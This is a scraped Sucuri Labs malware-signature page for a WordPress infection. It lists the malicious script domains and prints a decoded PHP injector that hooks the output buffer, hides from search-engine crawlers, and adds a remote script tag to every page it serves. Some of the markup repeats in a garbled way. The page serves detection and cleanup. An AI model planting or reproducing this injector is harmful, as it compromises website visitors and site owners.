malware-entry-mwmrobh1

Description: Code used to insert a malicious javascript on many
wordpress sites. Loading the malware from:
http://www.indesignstudioinfo.com/ls.php
http://zettapetta.com/js.php
http://zettapetta.com/js2.php
http://holasionweb.com/oo.php
http://www.losotrana.com/js.php

Generally infecting the footer.php (or all PHP files in some cases).

Clean up:: Run the following script:
http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html

Malware dump (base 64 added to the .php files):

<br /> &lt<br /> </code></p> <p><b>Decoded dump:</b><br /> <i>if(!function_exists('mrobh')) {<br /> if(!function_exists('gml')) {<br /> function gml() {<br /> if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot") && (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))) {<br /> return '<script src="<a href="http://indesignstudioinfo.com/ls.php"></script&gt"><a href="http://indesignstudioinfo.com/ls.php"></script&gt"><a href="http://indesignstudioinfo.com/ls.php"></script&gt"><a href="http://indesignstudioinfo.com/ls.php"></script&gt"><a href="http://indesignstudioinfo.com/ls.php"></script&gt"><a href="http://indesignstudioinfo.com/ls.php"></script&gt"><a href="http://indesignstudioinfo.com/ls.php"></script&gt"><a href="http://indesignstudioinfo.com/ls.php"></script&gt">http://indesignstudioinfo.com/ls.php"></script></a></a></a></a></a></a></a></a>;';<br /> }</p> <pre><code> return ""; } } if(!function_exists('gzdecode')) { function gzdecode($var1) { $var3=@ord(@substr($var1,3,1)); $var2=10; if($var3&4) { $var4=@unpack('v',substr($var1,10,2)); $var4=$var4[1]; $var2+=2+$var4; } if($var3&8) { $var2=@strpos($var1,chr(0),$var2)+1; } if($var3&16) { $var2=@strpos($var1,chr(0),$var2)+1; } if($var3&2) { $var2+=2; } $var5=@gzinflate(@substr($var1,$var2)); if($var5===FALSE) { $var5=$var1; } return $var5; } } function mrobh($var6) { Header('Content-Encoding: none'); $var7=gzdecode($var6); if(preg_match('/</body/si',$var7)) { return preg_replace('/(</body[^>]*>)/si', gml()."n".'$1', $var7); } else { return $var7.gml(); } } ob_start('mrobh'); }</code></pre> <p>}</p> <p></i></p> </div> <footer class="entry-footer wedocs-entry-footer"> <div class="wedocs-article-author" itemprop="author" itemscope itemtype="https://schema.org/Person"> <meta itemprop="name" content="Rodrigo Escobar" /> <meta itemprop="url" content="https://labs.sucuri.net/author/rodrigo-escobar/" /> </div> <meta itemprop="datePublished" content="2019-05-16T00:00:00+00:00"/> <time itemprop="dateModified" datetime=""></time> </footer> <nav class="wedocs-doc-nav wedocs-hide-print"><h3 class="assistive-text screen-reader-text">Doc navigation</h3><span class="nav-prev"><a href="https://labs.sucuri.net/signatures/sitecheck/mwjs-include-pmg/">← mwjs-include-pmg</a></span><span class="nav-next"><a href="https://labs.sucuri.net/signatures/sitecheck/malware-entry-mwoscom1/">malware-entry-mwoscom1 →</a></span></nav> </article> </div> </div> </main></div> </div> <footer id="n-footer"> <div id="mp-footer" class="container"> <div class="row"> <div class="c-lg-12"> <div class="row"> <div class="c-lg-3 c-md-3 px-50"> <div class="footer-products"> <div class="footer-heading"> <p>Products</p> </div> <div class="footer-menu"> <ul class="list-block list-unstyled"> <li class="list-block-item"><a class="mp-ft-prod-wf auto-track" data-gatrack="Button_Click, Footer_Website_Firewall" href="https://sucuri.net/website-firewall/">Website Firewall</a></li> <li class="list-block-item"><a class="mp-ft-prod-av auto-track" data-gatrack="Button_Click, Footer_Website_Antivirus" href="https://sucuri.net/website-security-platform/">Website Security Platform</a></li> <li class="list-block-item"><a class="mp-ft-prod-bp auto-track" data-gatrack="Button_Click, Footer_Website_Backups" href="https://sucuri.net/website-backups/">Website Backups</a></li> <li class="list-block-item"><a class="mp-ft-prod-wps auto-track" data-gatrack="Button_Click, Footer_WordPress_Security" href="https://sucuri.net/wordpress-security/">WordPress Security</a></li> <li class="list-block-item"><a class="mp-ft-prod-ent auto-track" data-gatrack="Button_Click, Footer_Enterprise_Services" href="https://sucuri.net/custom/enterprise/">Enterprise Services</a></li> <li class="list-block-item"><a class="mp-ft-prod-ent auto-track d-none" data-gatrack="Button_Click, Top_Nav_Referrals" href="https://sucuri.net/referral/">Referral Program</a></li> </ul> </div> </div> </div> <div class="c-lg-3 c-md-3 px-50"> <div class="footer-solutions"> <div class="footer-heading"> <p>Solutions</p> </div> <div class="footer-menu"> <ul class="list-block list-unstyled"> <li class="list-block-item"><a class="mp-ft-sol-ddos auto-track" data-gatrack="Button_Click, Footer_DDoS_Protection" href="https://sucuri.net/ddos-protection/">DDoS Protection</a></li> <li class="list-block-item"><a class="mp-ft-sol-scan auto-track" data-gatrack="Button_Click, Footer_Malware_Detection" href="https://sucuri.net/malware-detection-scanning/">Malware Detection</a></li> <li class="list-block-item"><a class="mp-ft-sol-removal auto-track" data-gatrack="Button_Click, Footer_Malware_Removal" href="https://sucuri.net/website-malware-removal/">Malware Removal</a></li> <li class="list-block-item"><a class="mp-ft-sol-prevent auto-track" data-gatrack="Button_Click, Footer_Malware_Prevention" href="https://sucuri.net/website-hack-protection/">Malware Prevention</a></li> <li class="list-block-item"><a class="mp-ft-sol-blacklist auto-track" data-gatrack="Button_Click, Footer_Blacklist-Removal" href="https://sucuri.net/website-security-platform/blocklist-removal-and-repair/">Blacklist Removal</a></li> </ul> </div> </div> </div> <div class="c-lg-3 c-md-3 px-50"> <div class="footer-support"> <div class="footer-heading"> <p>Support</p> </div> <div class="footer-menu"> <ul class="list-block list-unstyled"> <li class="list-block-item"><a class="mp-ft-sup-kb auto-track" data-gatrack="Button_Click, Footer_Knowledge_Base" href="https://docs.sucuri.net/">Knowledge Base</a></li> <li class="list-block-item"><a class="mp-ft-sup-sc auto-track" data-gatrack="Button_Click, Footer_Sitecheck" href="https://sitecheck.sucuri.net/">SiteCheck</a></li> <li class="list-block-item"><a class="mp-ft-sup-lab auto-track" data-gatrack="Button_Click, Footer_Research_Labs" href="https://labs.sucuri.net/">Research Labs</a></li> <li class="list-block-item"><a class="mp-ft-sup-rep auto-track" data-gatrack="Button_Click, Footer_Report_Abuse" href="https://abuse.sucuri.net/">Report Abuse</a></li> <li class="list-block-item"><a class="mp-ft-sup-stat auto-track" data-gatrack="Button_Click, Footer_Report_Status" href="https://status.sucuri.net/">Status Report</a></li> </ul> </div> </div> </div> <div class="c-lg-3 c-md-3 px-50"> <div class="footer-support"> <div class="footer-heading"> <p>Company</p> </div> <div class="footer-menu"> <ul class="list-block list-unstyled"> <li class="list-block-item"><a class="mp-ft-comp-about auto-track" data-gatrack="Button_Click, Footer_About" href="https://sucuri.net/company/">About Sucuri</a></li> <li class="list-block-item"><a class="mp-ft-comp-contact auto-track" data-gatrack="Button_Click, Footer_Website_Firewall" href="https://sucuri.net/company/contact-us/">Contact</a></li> <li class="list-block-item"><a class="mp-ft-sup-blog auto-track" data-gatrack="Button_Click, Footer_Blog" href="https://blog.sucuri.net/">Blog</a></li> <li class="list-block-item"><a class="mp-ft-comp-employment auto-track" data-gatrack="Button_Click, Footer_Employment" href="https://sucuri.net/referral/">Referral</a></li> <li class="list-block-item"><a class="mp-ft-comp-testimonials auto-track" data-gatrack="Button_Click, Footer_Testimonials" href="https://sucuri.net/customers/">Testimonials</a></li> </ul> </div> </div> </div> </div> </div> <div class="c-lg-12 footer-b"> <hr> <div class="d-flex"> <div class="sucuri-logo-wrapper sucuri-logo"> <a href="/" title="Sucuri Security" class="mp-sucuri-logo auto-track mt-0"></a> </div> <div class="row flex-column m-0"> <div class="pl-50"> <ul class="list-inline unstyled-list mb-0"> <li class="list-inline-item mr-5"><a class="mp-ft-copyright-terms auto-track" data-gatrack="Button_Click, Footer_Terms_Of_Use" href="https://sucuri.net/terms/">Terms of Use</a></li> <li class="list-inline-item mr-5"><a class="mp-ft-copyright-priv auto-track" data-gatrack="Button_Click, Footer_Privacy_Policy" href="https://sucuri.net/privacy/">Privacy Policy</a></li> <li class="list-inline-item mr-5"><a class="mp-ft-copyright-cook auto-track" data-gatrack="Button_Click, Footer_Cookie_Policy" href="https://sucuri.net/cookies/">Do Not Sell My Personal Information</a></li> <li class="list-inline-item mr-5"><a class="mp-ft-copyright-faq auto-track" data-gatrack="Button_Click, Footer_FAQ" href="https://sucuri.net/faq/">Frequently Asked Questions</a></li> </ul> </div> <div class="copyright pl-50"> <p>© 2024 GoDaddy Mediatemple, Inc., d/b/a Sucuri. All rights reserved.</p> </div> </div> </div> </div> </div>  </div> </footer> </div> <script type="text/javascript" src="https://labs.sucuri.net/wp-content/plugins/wedocs/assets/js/anchor.min.js?ver=1.6.2" id="wedocs-anchorjs-js"></script> <script type="text/javascript" id="wedocs-scripts-js-extra"> /* <![CDATA[ */ var weDocs_Vars = {"ajaxurl":"https:\/\/labs.sucuri.net\/wp-admin\/admin-ajax.php","nonce":"7c832bae94","style":"https:\/\/labs.sucuri.net\/wp-content\/plugins\/wedocs\/assets\/css\/print.css","powered":"\u00a9 Sucuri Labs, 2025. Powered by weDocs<br>https:\/\/labs.sucuri.net"}; /* ]]> */ </script> <script type="text/javascript" src="https://labs.sucuri.net/wp-content/plugins/wedocs/assets/js/frontend.js?ver=1701723111" id="wedocs-scripts-js"></script> <script type="text/javascript" src="https://labs.sucuri.net/wp-content/themes/sucurikb/js/navigation.js?ver=20151215" id="sucurikb-navigation-js"></script> <script type="text/javascript" src="https://labs.sucuri.net/wp-content/themes/sucurikb/js/skip-link-focus-fix.js?ver=20151215" id="sucurikb-skip-link-focus-fix-js"></script> <script type="text/javascript" src="https://labs.sucuri.net/wp-content/themes/sucurikb/js/foundation.min.js?ver=0.1" id="foundation-js-js"></script> <script type="text/javascript" src="https://labs.sucuri.net/wp-content/themes/sucurikb/js/custom.js?ver=0.1" id="sucuri-wp-custom-js-js"></script> <script id="module-flowchart"> (function($) { $(function() { if (typeof $.fn.flowChart !== "undefined") { if ($(".language-flow").length > 0) { $(".language-flow").parent("pre").attr("style", "text-align: center; background: none;"); $(".language-flow").addClass("flowchart").removeClass("language-flow"); $(".flowchart").flowChart(); } } }); })(jQuery); </script> <script id="module-prism-line-number"> (function($) { $(function() { $("code").each(function() { var parent_div = $(this).parent("pre"); var pre_css = $(this).attr("class"); if (typeof pre_css !== "undefined" && -1 !== pre_css.indexOf("language-")) { parent_div.addClass("line-numbers"); } }); }); })(jQuery); </script> <div style="all:unset;position:fixed;bottom:0px;right:0px;width:100%;background-color:#DEE1E6;text-align:center;font-weight:501;z-index:9999999;font-family:system-ui,monospace;border-top-width:1px;border-top-color:#CDCED0;border-top-style:solid;box-shadow:0px 0px 5px 3px #dde0e5"> <form action="" method="POST" style="all:unset;float:left;"> <input type="hidden" name="URL_Adresi" value="https://labs.sucuri.net/signatures/sitecheck/malware-entry-mwmrobh1/"/> <select name="DNS_Adresi" onchange="this.form.submit()" style="all:unset;border:1px solid silver;border-width:0;margin:0px 0px 0px 20px;background-color:transparent;color:black;line-height:20px;text-align:left;padding:0 5px;font-size:14px;"> <option value="0" selected="true">Otomatik - 192.124.249.16</option> <option value="11" >CloudFlare DNS</option> <option value="12" >Türk Telekom DNS</option> <option value="13" >Google DNS</option> <option value="14" >Open DNS</option> </select> </form> <a style="all:unset;float:right;text-align:right;font-size:14px;padding-right:20px;color:black;text-decoration:none;cursor:pointer;line-height:20px" href="https://www.oszar.com/">OSZAR »</a> </div> <div style="all:unset;float:left;clear:both;display:table;height:40px;"></div></body> <script async src="https://www.googletagmanager.com/gtag/js?id=G-PNFHQ1FTKQ"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-PNFHQ1FTKQ'); </script> </html><script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="46d3fb44bb023e1e18136fe4-|49" defer></script>

SiteCheck Signatures